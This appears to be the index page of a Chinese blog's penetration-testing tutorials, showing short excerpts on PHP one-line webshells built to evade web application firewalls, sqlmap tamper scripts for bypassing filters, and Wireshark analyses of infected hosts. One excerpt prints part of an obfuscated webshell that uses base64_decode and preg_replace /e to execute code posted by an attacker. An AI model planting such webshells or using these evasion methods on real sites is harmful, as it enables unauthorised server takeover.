渗透教程

浅析一句话后门中eval与assert执行条件与原理

eval与assert都算是元老级一句话后门函数,其实很多情形下代码的执行还是需要依靠eval去执行,只是前锋路转了而已。 eval与assert函数的用法大家可以自行百度。 eval与assert区别 eval函数中参数是字符,如: eval('echo 1;'); assert函数中参数为表达式 (或者为函数),如: assert(phpinfo()) assert(eval('ec…继续阅读 »
渗透教程

php一句话后门过狗姿势万千之后门构造与隐藏【二】

声明: 本文由博主首发于:阿里先知 https://xianzhi.aliyun.com/forum/read/441.html 如需要转载,请先联系先知技术社区授权;未经授权请勿转载。 先知技术社区投稿邮箱:Aliyun_xianzhi#service.alibaba.com 第二章节主要带给大家一些后门构造思路,与安全狗文件特征检测的机制。   另外强调一下,这篇…继续阅读 »
渗透教程

php一句话后门过狗姿势万千之传输层加工【三】

声明: 本文由博主首发于:阿里先知 https://xianzhi.aliyun.com/forum/read/442.html 如需要转载,请先联系先知技术社区授权;未经授权请勿转载。 先知技术社区投稿邮箱:Aliyun_xianzhi#service.alibaba.com   既然木马已就绪,那么想要利用木马,必然有一个数据传输的过程,数据提交是必须的,数据返回…继续阅读 »
渗透教程

php一句话后门过狗姿势万千之理论篇【一】

声明: 本文由博主首发于:阿里先知 https://xianzhi.aliyun.com/forum/read/441.html 如需要转载,请先联系先知技术社区授权;未经授权请勿转载。 先知技术社区投稿邮箱:Aliyun_xianzhi#service.alibaba.com 写在前面: 过狗相关的资料网上也是有很多,所以在我接下来的文章中,可能观点或者举例可能会与网…继续阅读 »
渗透工具 渗透教程

php一句话后门过5大WAF无压力[安全狗+360网站卫士+护卫神+D盾]

最近研究过狗一句话有点走火入魔,目前研究了几个版本的一句话,效果都还不错。 授之于鱼不如授之以渔,过几天准备从理论层,代码层,传输层写个过狗连载教程。 目前我使用的是cknife软件,类似于菜刀的开源软件,虽然还有不少bug,但高度自由修改,不用担心后门。我之所以没有用菜刀,…继续阅读 »
渗透教程

php一句话后门的几种变形分析[preg_replace函数]

今天偶然在土司看到一篇关于php后门的问题,让我联想到以前遇到过的一个一句话,共同点都是利用preg_replace中/e 修正符使replacement 参数当作 PHP 代码来执行。 先来看下原版代码 <?php $Base = "base6"."4"."_decod"."e"; $_clasc = $Base($_REQUEST['_exit']); $arr = array($Base($_POST['mcontent']) => '|.*|e',); @array_walk($arr, $_cla…继续阅读 »
渗透教程

教你如何获取360网站安全检测扫描官方御用字典

这是我之前发表在土司的一篇文章,在这里也分享给大家 360是个恶心的东西大家都懂的,但是有的时候我们可以小小的利用下。先上个图:  360网站在线扫描是可以扫描任意网站的,什么意思呢?我可以直接输入别人的网址,360会直接进行扫描,但是如果想看到扫描报告,那就得验证站长权限了。 …继续阅读 »
渗透教程

WireShark教程 – 黑客发现之旅(3) - Bodisparking恶意代码[转]

0x00 发现 接到客户需求,对其互联网办公区域主机安全分析。在对某一台主机通信数据进行分析时,过滤了一下HTTP协议。 一看数据,就发现异常,这台主机HTTP数据不多,但大量HTTP请求均为“Get heikewww/www.txt”,问题的发现当然不是因为拼音“heike”。点击“Info”排列一下,可以看得更清楚,还…继续阅读 »
渗透教程

WireShark教程 - 黑客发现之旅(2)—肉鸡邮件服务器[转]

0x00 背景 肉鸡也称傀儡机,是指可以被黑客远程控制的机器。一旦成为肉鸡,就可以被攻击者随意利用,如:窃取资料、再次发起攻击、破坏等等。下面将利用WireShark一起学习一种肉鸡的用途:广告垃圾邮件发送站。 0x01 发现问题 在对某企业服务器群进行安全检测时发现客户一台服务器(10.19…继续阅读 »
渗透教程

sqlmap注入之tamper绕过WAF防火墙过滤

每当注入的时候看到这个贱贱的提示框,内心有千万只草泥马在奔腾。   但很多时候还是得静下来分析过滤系统到底过滤了哪些参数,该如何绕过。 sqlmap中的tamper给我们带来了很多防过滤的脚本,非常实用,可能有的朋友还不知道怎样才能最有效的利用tamper脚本。 当然使用脚本之前…继续阅读 »